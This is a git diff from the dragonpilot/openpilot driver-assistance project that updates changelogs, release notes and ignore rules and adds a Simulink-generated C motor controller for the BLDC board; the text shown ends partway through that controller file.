diff --git a/.gitignore b/.gitignore index b35c11732..3d0a6b7bf 100644 --- a/.gitignore +++ b/.gitignore @@ -45,6 +45,7 @@ selfdrive/logcatd/logcatd selfdrive/mapd/default_speeds_by_region.json system/proclogd/proclogd selfdrive/ui/_ui +selfdrive/ui/translations/alerts_generated.h selfdrive/test/longitudinal_maneuvers/out selfdrive/car/tests/cars_dump system/camerad/camerad @@ -84,5 +85,4 @@ build/ !**/.gitkeep poetry.toml -selfdrive/ui/_ui_nonav -*.po~ +third_party/mapd/ \ No newline at end of file diff --git a/CHANGELOGS.md b/CHANGELOGS.md index 5250872e4..ceed2a11a 100644 --- a/CHANGELOGS.md +++ b/CHANGELOGS.md @@ -1,33 +1,6 @@ -dragonpilot [2023.7.5] +dragonpilot beta3 2023.07.26 ======================= -* 2023.7.4 release but with various bug fixes. - -dragonpilot [2023.7.4] -======================= -* Synced with openpilot master 2023.06.2 commits. -* comma 0.9.4 release - * MoonRise Model. - * Navigate on openpilot - * When navigation has a destination openpilot will input the map information into the model, generally improving behavior - * When navigating on openpilot, openpilot will keep left or right appropriately at forks/exits and take turns - * When navigating on openpilot, lane change behavior is unchanged and still activated by the driver - * UI updates - * Navigation settings moved to home screen and map - * UI alerts rework - * Border color always shows engagement status. Blue means disengaged, green means engaged, and grey means engaged with human overriding - * Alerts are shown inside the border. Black/grey means info, orange means warning, and red means critical alert - * Ford Focus 2018 support -* DP Highlight - * ADDED: 3 new Diplay mode. - * ADDED: 2 new Audible alert mode. - * TWEAK: Better TSS2 Long and DF tune. @cgw1968-5779 - * TWEAK: Gpxd Refactored. - * TWEAK: Fix Vision Turn Controller bug. - * TWEAK: DE2E tune. (Quicker detection) - * FIXED: Mapd toggle respects it's setting. - * FIXED: Display Mode. - * Various Bug fixes. - * coming to dp, soon™️ https://bit.ly/navonop +* openpilot master branch on 2023.07.21. dragonpilot [2023.5.12] ======================= diff --git a/README.md b/README.md index c1e4085de..5428ea7a9 100755 --- a/README.md +++ b/README.md @@ -103,7 +103,6 @@ Directory Structure ├── opendbc # Files showing how to interpret data from cars ├── panda # Code used to communicate on CAN ├── third_party # External libraries - ├── pyextra # Extra python packages └── system # Generic services ├── camerad # Driver to capture images from the camera sensors ├── clocksd # Broadcasts current time diff --git a/RELEASES.md b/RELEASES.md index 3754d5336..58b959368 100644 --- a/RELEASES.md +++ b/RELEASES.md @@ -1,15 +1,17 @@ -Version 0.9.4 (2023-XX-XX) +Version 0.9.4 (2023-07-27) ======================== -* Navigate on openpilot - * When navigation has a destination openpilot will input the map information into the model, generally improving behavior - * When navigating on openpilot, openpilot will keep left or right appropriately at forks/exits and take turns - * When navigating on openpilot, lane change behavior is unchanged and still activated by the driver +* Navigate on openpilot in Experimental mode + * When navigation has a destination, openpilot will input the map information into the model, which provides useful context to help the model understand the scene + * When navigating on openpilot, openpilot will keep left or right appropriately at forks and exits + * When navigating on openpilot, lane change behavior is unchanged and still activated by the driver + * When navigate on openpilot is active, the path on the map is green * UI updates * Navigation settings moved to home screen and map -* UI alerts rework * Border color always shows engagement status. Blue means disengaged, green means engaged, and grey means engaged with human overriding - * Alerts are shown inside the border. Black/grey means info, orange means warning, and red means critical alert + * Alerts are shown inside the border. Black means info, orange means warning, and red means critical alert +* Bookmarked segments are preserved on the device's storage * Ford Focus 2018 support +* Kia Carnival 2023 support thanks to sunnyhaibin! Version 0.9.3 (2023-06-29) ======================== diff --git a/body/board/bldc/BLDC_controller.c b/body/board/bldc/BLDC_controller.c new file mode 100644 index 000000000..ae63bd405 --- /dev/null +++ b/body/board/bldc/BLDC_controller.c @@ -0,0 +1,3376 @@ +/* + * File: BLDC_controller.c + * + * Code generated for Simulink model 'BLDC_controller'. + * + * Model version : 1.1297 + * Simulink Coder version : 8.13 (R2017b) 24-Jul-2017 + * C/C++ source code generated on : Sun Mar 6 11:02:11 2022 + * + * Target selection: ert.tlc + * Embedded hardware selection: ARM Compatible->ARM Cortex + * Emulation hardware selection: + * Differs from embedded hardware (MATLAB Host) + * Code generation objectives: + * 1. Execution efficiency + * 2. RAM efficiency + * Validation result: Not run + */ + +#include "BLDC_controller.h" + +/* Named constants for Chart: '/F03_02_Control_Mode_Manager' */ +#define IN_ACTIVE ((uint8_T)1U) +#define IN_NO_ACTIVE_CHILD ((uint8_T)0U) +#define IN_OPEN ((uint8_T)2U) +#define IN_SPEED_MODE ((uint8_T)1U) +#define IN_TORQUE_MODE ((uint8_T)2U) +#define IN_VOLTAGE_MODE ((uint8_T)3U) +#define OPEN_MODE ((uint8_T)0U) +#define SPD_MODE ((uint8_T)2U) +#define TRQ_MODE ((uint8_T)3U) +#define VLT_MODE ((uint8_T)1U) +#ifndef UCHAR_MAX +#include +#endif + +#if ( UCHAR_MAX != (0xFFU) ) || ( SCHAR_MAX != (0x7F) ) +#error Code was generated for compiler with different sized uchar/char. \ +Consider adjusting Test hardware word size settings on the \ +Hardware Implementation pane to match your compiler word sizes as \ +defined in limits.h of the compiler. Alternatively, you can \ +select the Test hardware is the same as production hardware option and \ +select the Enable portable word sizes option on the Code Generation > \ +Verification pane for ERT based targets, which will disable the \ +preprocessor word size checks. +#endif + +#if ( USHRT_MAX != (0xFFFFU) ) || ( SHRT_MAX != (0x7FFF) ) +#error Code was generated for compiler with different sized ushort/short. \ +Consider adjusting Test hardware word size settings on the \ +Hardware Implementation pane to match your compiler word sizes as \ +defined in limits.h of the compiler. Alternatively, you can \ +select the Test hardware is the same as production hardware option and \ +select the Enable portable word sizes option on the Code Generation > \ +Verification pane for ERT based targets, which will disable the \ +preprocessor word size checks. +#endif + +#if ( UINT_MAX != (0xFFFFFFFFU) ) || ( INT_MAX != (0x7FFFFFFF) ) +#error Code was generated for compiler with different sized uint/int. \ +Consider adjusting Test hardware word size settings on the \ +Hardware Implementation pane to match your compiler word sizes as \ +defined in limits.h of the compiler. Alternatively, you can \ +select the Test hardware is the same as production hardware option and \ +select the Enable portable word sizes option on the Code Generation > \ +Verification pane for ERT based targets, which will disable the \ +preprocessor word size checks. +#endif + +#if ( ULONG_MAX != (0xFFFFFFFFU) ) || ( LONG_MAX != (0x7FFFFFFF) ) +#error Code was generated for compiler with different sized ulong/long. \ +Consider adjusting Test hardware word size settings on the \ +Hardware Implementation pane to match your compiler word sizes as \ +defined in limits.h of the compiler. Alternatively, you can \ +select the Test hardware is the same as production hardware option and \ +select the Enable portable word sizes option on the Code Generation > \ +Verification pane for ERT based targets, which will disable the \ +preprocessor word size checks. +#endif + +#if 0 + +/* Skip this size verification because of preprocessor limitation */ +#if ( ULLONG_MAX != (0xFFFFFFFFFFFFFFFFULL) ) || ( LLONG_MAX != (0x7FFFFFFFFFFFFFFFLL) ) +#error Code was generated for compiler with different sized ulong_long/long_long. \ +Consider adjusting Test hardware word size settings on the \ +Hardware Implementation pane to match your compiler word sizes as \ +defined in limits.h of the compiler. Alternatively, you can \ +select the Test hardware is the same as production hardware option and \ +select the Enable portable word sizes option on the Code Generation > \ +Verification pane for ERT based targets, which will disable the \ +preprocessor word size checks. +#endif +#endif + +uint8_T plook_u8s16_evencka(int16_T u, int16_T bp0, uint16_T bpSpace, uint32_T + maxIndex); +uint8_T plook_u8u16_evencka(uint16_T u, uint16_T bp0, uint16_T bpSpace, uint32_T + maxIndex); +int32_T div_nde_s32_floor(int32_T numerator, int32_T denominator); +extern void Counter_Init(DW_Counter *localDW, int16_T rtp_z_cntInit); +extern int16_T Counter(int16_T rtu_inc, int16_T rtu_max, boolean_T rtu_rst, + DW_Counter *localDW); +extern void Low_Pass_Filter_Reset(DW_Low_Pass_Filter *localDW); +extern void Low_Pass_Filter(const int16_T rtu_u[2], uint16_T rtu_coef, int16_T + rty_y[2], DW_Low_Pass_Filter *localDW); +extern void Counter_b_Init(DW_Counter_b *localDW, uint16_T rtp_z_cntInit); +extern void Counter_n(uint16_T rtu_inc, uint16_T rtu_max, boolean_T rtu_rst, + uint16_T *rty_cnt, DW_Counter_b *localDW); +extern void either_edge(boolean_T rtu_u, boolean_T *rty_y, DW_either_edge + *localDW); +extern void Debounce_Filter_Init(DW_Debounce_Filter *localDW); +extern void Debounce_Filter(boolean_T rtu_u, uint16_T rtu_tAcv, uint16_T + rtu_tDeacv, boolean_T *rty_y, DW_Debounce_Filter *localDW); +extern void I_backCalc_fixdt_Init(DW_I_backCalc_fixdt *localDW, int32_T + rtp_yInit); +extern void I_backCalc_fixdt_Reset(DW_I_backCalc_fixdt *localDW, int32_T + rtp_yInit); +extern void I_backCalc_fixdt(int16_T rtu_err, uint16_T rtu_I, uint16_T rtu_Kb, + int16_T rtu_satMax, int16_T rtu_satMin, int16_T *rty_out, DW_I_backCalc_fixdt * + localDW); +extern void PI_clamp_fixdt_Init(DW_PI_clamp_fixdt *localDW); +extern void PI_clamp_fixdt_Reset(DW_PI_clamp_fixdt *localDW); +extern void PI_clamp_fixdt(int16_T rtu_err, uint16_T rtu_P, uint16_T rtu_I, + int32_T rtu_init, int16_T rtu_satMax, int16_T rtu_satMin, int32_T + rtu_ext_limProt, int16_T *rty_out, DW_PI_clamp_fixdt *localDW); +extern void PI_clamp_fixdt_d_Init(DW_PI_clamp_fixdt_m *localDW); +extern void PI_clamp_fixdt_b_Reset(DW_PI_clamp_fixdt_m *localDW); +extern void PI_clamp_fixdt_l(int16_T rtu_err, uint16_T rtu_P, uint16_T rtu_I, + int16_T rtu_init, int16_T rtu_satMax, int16_T rtu_satMin, int32_T + rtu_ext_limProt, int16_T *rty_out, DW_PI_clamp_fixdt_m *localDW); +extern void PI_clamp_fixdt_f_Init(DW_PI_clamp_fixdt_g *localDW); +extern void PI_clamp_fixdt_g_Reset(DW_PI_clamp_fixdt_g *localDW); +extern void PI_clamp_fixdt_k(int16_T rtu_err, uint16_T rtu_P, uint16_T rtu_I, + int16_T rtu_init, int16_T rtu_satMax, int16_T rtu_satMin, int32_T + rtu_ext_limProt, int16_T *rty_out, DW_PI_clamp_fixdt_g *localDW); +uint8_T plook_u8s16_evencka(int16_T u, int16_T bp0, uint16_T bpSpace, uint32_T + maxIndex) +{ + uint8_T bpIndex; + uint16_T fbpIndex; + + /* Prelookup - Index only + Index Search method: 'even' + Extrapolation method: 'Clip' + Use previous index: 'off' + Use last breakpoint for index at or above upper limit: 'on' + Remove protection against out-of-range input in generated code: 'off' + */ + if (u <= bp0) { + bpIndex = 0U; + } else { + fbpIndex = (uint16_T)((uint32_T)(uint16_T)(u - bp0) / bpSpace); + if (fbpIndex < maxIndex) { + bpIndex = (uint8_T)fbpIndex; + } else { + bpIndex = (uint8_T)maxIndex; + } + } + + return bpIndex; +} + +uint8_T plook_u8u16_evencka(uint16_T u, uint16_T bp0, uint16_T bpSpace, uint32_T + maxIndex) +{ + uint8_T bpIndex; + uint16_T fbpIndex; + + /* Prelookup - Index only + Index Search method: 'even' + Extrapolation method: 'Clip' + Use previous index: 'off' + Use last breakpoint for index at or above upper limit: 'on' + Remove protection against out-of-range input in generated code: 'off' + */ + if (u <= bp0) { + bpIndex = 0U; + } else { + fbpIndex = (uint16_T)((uint32_T)(uint16_T)((uint32_T)u - bp0) / bpSpace); + if (fbpIndex < maxIndex) { + bpIndex = (uint8_T)fbpIndex; + } else { + bpIndex = (uint8_T)maxIndex; + } + } + + return bpIndex; +} + +int32_T div_nde_s32_floor(int32_T numerator, int32_T denominator) +{ + return (((numerator < 0) != (denominator < 0)) && (numerator % denominator != + 0) ? -1 : 0) + numerator / denominator; +} + +/* System initialize for atomic system: '/Counter' */ +void Counter_Init(DW_Counter *localDW, int16_T rtp_z_cntInit) +{ + /* InitializeConditions for UnitDelay: '/UnitDelay' */ + localDW->UnitDelay_DSTATE = rtp_z_cntInit; +} + +/* Output and update for atomic system: '/Counter' */ +int16_T Counter(int16_T rtu_inc, int16_T rtu_max, boolean_T rtu_rst, DW_Counter * + localDW) +{ + int16_T rtu_rst_0; + int16_T rty_cnt_0; + + /* Switch: '/Switch1' incorporates: + * Constant: '/Constant23' + * UnitDelay: '/UnitDelay' + */ + if (rtu_rst) { + rtu_rst_0 = 0; + } else { + rtu_rst_0 = localDW->UnitDelay_DSTATE; + } + + /* End of Switch: '/Switch1' */ + + /* Sum: '/Sum1' */ + rty_cnt_0 = (int16_T)(rtu_inc + rtu_rst_0); + + /* MinMax: '/MinMax' */ + if (rty_cnt_0 < rtu_max) { + /* Update for UnitDelay: '/UnitDelay' */ + localDW->UnitDelay_DSTATE = rty_cnt_0; + } else { + /* Update for UnitDelay: '/UnitDelay' */ + localDW->UnitDelay_DSTATE = rtu_max; + } + + /* End of MinMax: '/MinMax' */ + return rty_cnt_0; +} + +/* System reset for atomic system: '/Low_Pass_Filter' */ +void Low_Pass_Filter_Reset(DW_Low_Pass_Filter *localDW) +{ + /* InitializeConditions for UnitDelay: '/UnitDelay1' */ + localDW->UnitDelay1_DSTATE[0] = 0; + localDW->UnitDelay1_DSTATE[1] = 0; +} + +/* Output and update for atomic system: '/Low_Pass_Filter' */ +void Low_Pass_Filter(const int16_T rtu_u[2], uint16_T rtu_coef, int16_T rty_y[2], + DW_Low_Pass_Filter *localDW) +{ + int32_T rtb_Sum3_g; + + /* Sum: '/Sum2' incorporates: + * UnitDelay: '/UnitDelay1' + */ + rtb_Sum3_g = rtu_u[0] - (localDW->UnitDelay1_DSTATE[0] >> 16); + if (rtb_Sum3_g > 32767) { + rtb_Sum3_g = 32767; + } else { + if (rtb_Sum3_g < -32768) { + rtb_Sum3_g = -32768; + } + } + + /* Sum: '/Sum3' incorporates: + * Product: '/Divide3' + * Sum: '/Sum2' + * UnitDelay: '/UnitDelay1' + */ + rtb_Sum3_g = rtu_coef * rtb_Sum3_g + localDW->UnitDelay1_DSTATE[0]; + + /* DataTypeConversion: '/Data Type Conversion' */ + rty_y[0] = (int16_T)(rtb_Sum3_g >> 16); + + /* Update for UnitDelay: '/UnitDelay1' */ + localDW->UnitDelay1_DSTATE[0] = rtb_Sum3_g; + + /* Sum: '/Sum2' incorporates: + * UnitDelay: '/UnitDelay1' + */ + rtb_Sum3_g = rtu_u[1] - (localDW->UnitDelay1_DSTATE[1] >> 16); + if (rtb_Sum3_g > 32767) { + rtb_Sum3_g = 32767; + } else { + if (rtb_Sum3_g < -32768) { + rtb_Sum3_g = -32768; + } + } + + /* Sum: '/Sum3' incorporates: + * Product: '/Divide3' + * Sum: '/Sum2' + * UnitDelay: '/UnitDelay1' + */ + rtb_Sum3_g = rtu_coef * rtb_Sum3_g + localDW->UnitDelay1_DSTATE[1]; + + /* DataTypeConversion: '/Data Type Conversion' */ + rty_y[1] = (int16_T)(rtb_Sum3_g >> 16); + + /* Update for UnitDelay: '/UnitDelay1' */ + localDW->UnitDelay1_DSTATE[1] = rtb_Sum3_g; +} + +/* + * System initialize for atomic system: + * '/Counter' + * '/Counter' + */ +void Counter_b_Init(DW_Counter_b *localDW, uint16_T rtp_z_cntInit) +{ + /* InitializeConditions for UnitDelay: '/UnitDelay' */ + localDW->UnitDelay_DSTATE = rtp_z_cntInit; +} + +/* + * Output and update for atomic system: + * '/Counter' + * '/Counter' + */ +void Counter_n(uint16_T rtu_inc, uint16_T rtu_max, boolean_T rtu_rst, uint16_T + *rty_cnt, DW_Counter_b *localDW) +{ + uint16_T rtu_rst_0; + + /* Switch: '/Switch1' incorporates: + * Constant: '/Constant23' + * UnitDelay: '/UnitDelay' + */ + if (rtu_rst) { + rtu_rst_0 = 0U; + } else { + rtu_rst_0 = localDW->UnitDelay_DSTATE; + } + + /* End of Switch: '/Switch1' */ + + /* Sum: '/Sum1' */ + *rty_cnt = (uint16_T)((uint32_T)rtu_inc + rtu_rst_0); + + /* MinMax: '/MinMax' */ + if (*rty_cnt < rtu_max) { + /* Update for UnitDelay: '/UnitDelay' */ + localDW->UnitDelay_DSTATE = *rty_cnt; + } else { + /* Update for UnitDelay: '/UnitDelay' */ + localDW->UnitDelay_DSTATE = rtu_max; + } + + /* End of MinMax: '/MinMax' */ +} + +/* + * Output and update for atomic system: + * '/either_edge' + * '/either_edge' + */ +void either_edge(boolean_T rtu_u, boolean_T *rty_y, DW_either_edge *localDW) +{ + /* RelationalOperator: '/Relational Operator' incorporates: + * UnitDelay: '/UnitDelay' + */ + *rty_y = (rtu_u != localDW->UnitDelay_DSTATE); + + /* Update for UnitDelay: '/UnitDelay' */ + localDW->UnitDelay_DSTATE = rtu_u; +} + +/* System initialize for atomic system: '/Debounce_Filter' */ +void Debounce_Filter_Init(DW_Debounce_Filter *localDW) +{ + /* SystemInitialize for IfAction SubSystem: '/Qualification' */ + + /* SystemInitialize for Atomic SubSystem: '/Counter' */ + Counter_b_Init(&localDW->Counter_n1, 0U); + + /* End of SystemInitialize for SubSystem: '/Counter' */ + + /* End of SystemInitialize for SubSystem: '/Qualification' */ + + /* SystemInitialize for IfAction SubSystem: '/Dequalification' */ + + /* SystemInitialize for Atomic SubSystem: '/Counter' */ + Counter_b_Init(&localDW->Counter_e, 0U); + + /* End of SystemInitialize for SubSystem: '/Counter' */ + + /* End of SystemInitialize for SubSystem: '/Dequalification' */ +} + +/* Output and update for atomic system: '/Debounce_Filter' */ +void Debounce_Filter(boolean_T rtu_u, uint16_T rtu_tAcv, uint16_T rtu_tDeacv, + boolean_T *rty_y, DW_Debounce_Filter *localDW) +{ + uint16_T rtb_Sum1_n; + boolean_T rtb_RelationalOperator_g; + + /* Outputs for Atomic SubSystem: '/either_edge' */ + either_edge(rtu_u, &rtb_RelationalOperator_g, &localDW->either_edge_p); + + /* End of Outputs for SubSystem: '/either_edge' */ + + /* If: '/If2' incorporates: + * Constant: '/Constant6' + * Constant: '/Constant6' + * Inport: '/yPrev' + * Logic: '/Logical Operator1' + * Logic: '/Logical Operator2' + * Logic: '/Logical Operator3' + * Logic: '/Logical Operator4' + * UnitDelay: '/UnitDelay' + */ + if (rtu_u && (!localDW->UnitDelay_DSTATE)) { + /* Outputs for IfAction SubSystem: '/Qualification' incorporates: + * ActionPort: '/Action Port' + */ + + /* Outputs for Atomic SubSystem: '/Counter' */ + Counter_n(1U, rtu_tAcv, rtb_RelationalOperator_g, &rtb_Sum1_n, + &localDW->Counter_n1); + + /* End of Outputs for SubSystem: '/Counter' */ + + /* Switch: '/Switch2' incorporates: + * Constant: '/Constant6' + * RelationalOperator: '/Relational Operator2' + */ + *rty_y = ((rtb_Sum1_n > rtu_tAcv) || localDW->UnitDelay_DSTATE); + + /* End of Outputs for SubSystem: '/Qualification' */ + } else if ((!rtu_u) && localDW->UnitDelay_DSTATE) { + /* Outputs for IfAction SubSystem: '/Dequalification' incorporates: + * ActionPort: '/Action Port' + */ + + /* Outputs for Atomic SubSystem: '/Counter' */ + Counter_n(1U, rtu_tDeacv, rtb_RelationalOperator_g, &rtb_Sum1_n, + &localDW->Counter_e); + + /* End of Outputs for SubSystem: '/Counter' */ + + /* Switch: '/Switch2' incorporates: + * Constant: '/Constant6' + * RelationalOperator: '/Relational Operator2' + */ + *rty_y = ((!(rtb_Sum1_n > rtu_tDeacv)) && localDW->UnitDelay_DSTATE); + + /* End of Outputs for SubSystem: '/Dequalification' */ + } else { + /* Outputs for IfAction SubSystem: '/Default' incorporates: + * ActionPort: '/Action Port' + */ + *rty_y = localDW->UnitDelay_DSTATE; + + /* End of Outputs for SubSystem: '/Default' */ + } + + /* End of If: '/If2' */ + + /* Update for UnitDelay: '/UnitDelay' */ + localDW->UnitDelay_DSTATE = *rty_y; +} + +/* + * System initialize for atomic system: + * '/I_backCalc_fixdt' + * '/I_backCalc_fixdt1' + * '/I_backCalc_fixdt' + */ +void I_backCalc_fixdt_Init(DW_I_backCalc_fixdt *localDW, int32_T rtp_yInit) +{ + /* InitializeConditions for UnitDelay: '/UnitDelay' */ + localDW->UnitDelay_DSTATE_m = rtp_yInit; +} + +/* + * System reset for atomic system: + * '/I_backCalc_fixdt' + * '/I_backCalc_fixdt1' + * '/I_backCalc_fixdt' + */ +void I_backCalc_fixdt_Reset(DW_I_backCalc_fixdt *localDW, int32_T rtp_yInit) +{ + /* InitializeConditions for UnitDelay: '/UnitDelay' */ + localDW->UnitDelay_DSTATE = 0; + + /* InitializeConditions for UnitDelay: '/UnitDelay' */ + localDW->UnitDelay_DSTATE_m = rtp_yInit; +} + +/* + * Output and update for atomic system: + * '/I_backCalc_fixdt' + * '/I_backCalc_fixdt1' + * '/I_backCalc_fixdt' + */ +void I_backCalc_fixdt(int16_T rtu_err, uint16_T rtu_I, uint16_T rtu_Kb, int16_T + rtu_satMax, int16_T rtu_satMin, int16_T *rty_out, + DW_I_backCalc_fixdt *localDW) +{ + int32_T rtb_Sum1_o; + int16_T rtb_DataTypeConversion1_gf; + + /* Sum: '/Sum2' incorporates: + * Product: '/Divide2' + * UnitDelay: '/UnitDelay' + */ + rtb_Sum1_o = (rtu_err * rtu_I) >> 4; + if ((rtb_Sum1_o < 0) && (localDW->UnitDelay_DSTATE < MIN_int32_T - rtb_Sum1_o)) + { + rtb_Sum1_o = MIN_int32_T; + } else if ((rtb_Sum1_o > 0) && (localDW->UnitDelay_DSTATE > MAX_int32_T + - rtb_Sum1_o)) { + rtb_Sum1_o = MAX_int32_T; + } else { + rtb_Sum1_o += localDW->UnitDelay_DSTATE; + } + + /* End of Sum: '/Sum2' */ + + /* Sum: '/Sum1' incorporates: + * UnitDelay: '/UnitDelay' + */ + rtb_Sum1_o += localDW->UnitDelay_DSTATE_m; + + /* DataTypeConversion: '/Data Type Conversion1' */ + rtb_DataTypeConversion1_gf = (int16_T)(rtb_Sum1_o >> 12); + + /* Switch: '/Switch2' incorporates: + * RelationalOperator: '/LowerRelop1' + * RelationalOperator: '/UpperRelop' + * Switch: '/Switch' + */ + if (rtb_DataTypeConversion1_gf > rtu_satMax) { + *rty_out = rtu_satMax; + } else if (rtb_DataTypeConversion1_gf < rtu_satMin) { + /* Switch: '/Switch' */ + *rty_out = rtu_satMin; + } else { + *rty_out = rtb_DataTypeConversion1_gf; + } + + /* End of Switch: '/Switch2' */ + + /* Update for UnitDelay: '/UnitDelay' incorporates: + * Product: '/Divide1' + * Sum: '/Sum3' + */ + localDW->UnitDelay_DSTATE = (int16_T)(*rty_out - rtb_DataTypeConversion1_gf) * + rtu_Kb; + + /* Update for UnitDelay: '/UnitDelay' */ + localDW->UnitDelay_DSTATE_m = rtb_Sum1_o; +} + +/* System initialize for atomic system: '/PI_clamp_fixdt' */ +void PI_clamp_fixdt_Init(DW_PI_clamp_fixdt *localDW) +{ + /* InitializeConditions for Delay: '/Resettable Delay' */ + localDW->icLoad = 1U; +} + +/* System reset for atomic system: '/PI_clamp_fixdt' */ +void PI_clamp_fixdt_Reset(DW_PI_clamp_fixdt *localDW) +{ + /* InitializeConditions for UnitDelay: '/UnitDelay1' */ + localDW->UnitDelay1_DSTATE = false; + + /* InitializeConditions for Delay: '/Resettable Delay' */ + localDW->icLoad = 1U; +} + +/* Output and update for atomic system: '/PI_clamp_fixdt' */ +void PI_clamp_fixdt(int16_T rtu_err, uint16_T rtu_P, uint16_T rtu_I, int32_T + rtu_init, int16_T rtu_satMax, int16_T rtu_satMin, int32_T + rtu_ext_limProt, int16_T *rty_out, DW_PI_clamp_fixdt + *localDW) +{ + boolean_T rtb_LowerRelop1_c0; + boolean_T rtb_UpperRelop_f; + int32_T rtb_Sum1_p0; + int32_T q0; + int32_T tmp; + int16_T tmp_0; + + /* Sum: '/Sum2' incorporates: + * Product: '/Divide2' + */ + q0 = rtu_err * rtu_I; + if ((q0 < 0) && (rtu_ext_limProt < MIN_int32_T - q0)) { + q0 = MIN_int32_T; + } else if ((q0 > 0) && (rtu_ext_limProt > MAX_int32_T - q0)) { + q0 = MAX_int32_T; + } else { + q0 += rtu_ext_limProt; + } + + /* Delay: '/Resettable Delay' */ + if (localDW->icLoad != 0) { + localDW->ResettableDelay_DSTATE = rtu_init; + } + + /* Switch: '/Switch1' incorporates: + * Constant: '/Constant' + * Sum: '/Sum2' + * UnitDelay: '/UnitDelay1' + */ + if (localDW->UnitDelay1_DSTATE) { + tmp = 0; + } else { + tmp = q0; + } + + /* End of Switch: '/Switch1' */ + + /* Sum: '/Sum1' incorporates: + * Delay: '/Resettable Delay' + */ + rtb_Sum1_p0 = tmp + localDW->ResettableDelay_DSTATE; + + /* Product: '/Divide5' */ + tmp = (rtu_err * rtu_P) >> 11; + if (tmp > 32767) { + tmp = 32767; + } else { + if (tmp < -32768) { + tmp = -32768; + } + } + + /* Sum: '/Sum1' incorporates: + * DataTypeConversion: '/Data Type Conversion1' + * Product: '/Divide5' + */ + tmp = (((rtb_Sum1_p0 >> 16) << 1) + tmp) >> 1; + if (tmp > 32767) { + tmp = 32767; + } else { + if (tmp < -32768) { + tmp = -32768; + } + } + + /* RelationalOperator: '/LowerRelop1' incorporates: + * Sum: '/Sum1' + */ + rtb_LowerRelop1_c0 = ((int16_T)tmp > rtu_satMax); + + /* RelationalOperator: '/UpperRelop' incorporates: + * Sum: '/Sum1' + */ + rtb_UpperRelop_f = ((int16_T)tmp < rtu_satMin); + + /* Switch: '/Switch1' incorporates: + * Sum: '/Sum1' + * Switch: '/Switch3' + */ + if (rtb_LowerRelop1_c0) { + *rty_out = rtu_satMax; + } else if (rtb_UpperRelop_f) { + /* Switch: '/Switch3' */ + *rty_out = rtu_satMin; + } else { + *rty_out = (int16_T)tmp; + } + + /* End of Switch: '/Switch1' */ + + /* Signum: '/SignDeltaU2' incorporates: + * Sum: '/Sum2' + */ + if (q0 < 0) { + q0 = -1; + } else { + q0 = (q0 > 0); + } + + /* End of Signum: '/SignDeltaU2' */ + + /* Signum: '/SignDeltaU3' incorporates: + * Sum: '/Sum1' + */ + if ((int16_T)tmp < 0) { + tmp_0 = -1; + } else { + tmp_0 = (int16_T)((int16_T)tmp > 0); + } + + /* End of Signum: '/SignDeltaU3' */ + + /* Update for UnitDelay: '/UnitDelay1' incorporates: + * DataTypeConversion: '/DataTypeConv4' + * Logic: '/AND1' + * Logic: '/AND1' + * RelationalOperator: '/Equal1' + */ + localDW->UnitDelay1_DSTATE = ((q0 == tmp_0) && (rtb_LowerRelop1_c0 || + rtb_UpperRelop_f)); + + /* Update for Delay: '/Resettable Delay' */ + localDW->icLoad = 0U; + localDW->ResettableDelay_DSTATE = rtb_Sum1_p0; +} + +/* System initialize for atomic system: '/PI_clamp_fixdt' */ +void PI_clamp_fixdt_d_Init(DW_PI_clamp_fixdt_m *localDW) +{ + /* InitializeConditions for Delay: '/Resettable Delay' */ + localDW->icLoad = 1U; +} + +/* System reset for atomic system: '/PI_clamp_fixdt' */ +void PI_clamp_fixdt_b_Reset(DW_PI_clamp_fixdt_m *localDW) +{ + /* InitializeConditions for UnitDelay: '/UnitDelay1' */ + localDW->UnitDelay1_DSTATE = false; + + /* InitializeConditions for Delay: '/Resettable Delay' */ + localDW->icLoad = 1U; +} + +/* Output and update for atomic system: '/PI_clamp_fixdt' */ +void PI_clamp_fixdt_l(int16_T rtu_err, uint16_T rtu_P, uint16_T rtu_I, int16_T + rtu_init, int16_T rtu_satMax, int16_T rtu_satMin, int32_T + rtu_ext_limProt, int16_T *rty_out, DW_PI_clamp_fixdt_m + *localDW) +{ + boolean_T rtb_LowerRelop1_l; + boolean_T rtb_UpperRelop_l; + int32_T rtb_Sum1_ni; + int32_T q0; + int32_T tmp; + int16_T tmp_0; + + /* Sum: '/Sum2' incorporates: + * Product: '/Divide2' + */ + q0 = rtu_err * rtu_I; + if ((q0 < 0) && (rtu_ext_limProt < MIN_int32_T - q0)) { + q0 = MIN_int32_T; + } else if ((q0 > 0) && (rtu_ext_limProt > MAX_int32_T - q0)) { + q0 = MAX_int32_T; + } else { + q0 += rtu_ext_limProt; + } + + /* Delay: '/Resettable Delay' */ + if (localDW->icLoad != 0) { + localDW->ResettableDelay_DSTATE = rtu_init << 16; + } + + /* Switch: '/Switch1' incorporates: + * Constant: '/Constant' + * Sum: '/Sum2' + * UnitDelay: '/UnitDelay1' + */ + if (localDW->UnitDelay1_DSTATE) { + tmp = 0; + } else { + tmp = q0; + } + + /* End of Switch: '/Switch1' */ + + /* Sum: '/Sum1' incorporates: + * Delay: '/Resettable Delay' + */ + rtb_Sum1_ni = tmp + localDW->ResettableDelay_DSTATE; + + /* Product: '/Divide5' */ + tmp = (rtu_err * rtu_P) >> 11; + if (tmp > 32767) { + tmp = 32767; + } else { + if (tmp < -32768) { + tmp = -32768; + } + } + + /* Sum: '/Sum1' incorporates: + * DataTypeConversion: '/Data Type Conversion1' + * Product: '/Divide5' + */ + tmp = (((rtb_Sum1_ni >> 16) << 1) + tmp) >> 1; + if (tmp > 32767) { + tmp = 32767; + } else { + if (tmp < -32768) { + tmp = -32768; + } + } + + /* RelationalOperator: '/LowerRelop1' incorporates: + * Sum: '/Sum1' + */ + rtb_LowerRelop1_l = ((int16_T)tmp > rtu_satMax); + + /* RelationalOperator: '/UpperRelop' incorporates: + * Sum: '/Sum1' + */ + rtb_UpperRelop_l = ((int16_T)tmp < rtu_satMin); + + /* Switch: '/Switch1' incorporates: + * Sum: '/Sum1' + * Switch: '/Switch3' + */ + if (rtb_LowerRelop1_l) { + *rty_out = rtu_satMax; + } else if (rtb_UpperRelop_l) { + /* Switch: '/Switch3' */ + *rty_out = rtu_satMin; + } else { + *rty_out = (int16_T)tmp; + } + + /* End of Switch: '/Switch1' */ + + /* Signum: '/SignDeltaU2' incorporates: + * Sum: '/Sum2' + */ + if (q0 < 0) { + q0 = -1; + } else { + q0 = (q0 > 0); + } + + /* End of Signum: '/SignDeltaU2' */ + + /* Signum: '/SignDeltaU3' incorporates: + * Sum: '/Sum1' + */ + if ((int16_T)tmp < 0) { + tmp_0 = -1; + } else { + tmp_0 = (int16_T)((int16_T)tmp > 0); + } + + /* End of Signum: '/SignDeltaU3' */ 